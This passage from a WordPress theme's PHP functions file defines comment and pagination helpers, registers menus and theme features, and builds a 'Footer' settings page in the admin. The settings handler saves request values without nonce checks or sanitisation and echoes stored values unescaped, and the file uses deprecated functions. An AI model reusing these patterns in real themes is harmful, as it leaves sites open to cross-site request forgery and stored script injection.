		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Footer", "Footer", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' settings saved.</strong></p></div>';
?>
<div class="wrap">
	<h2>Footer</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Save changes" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
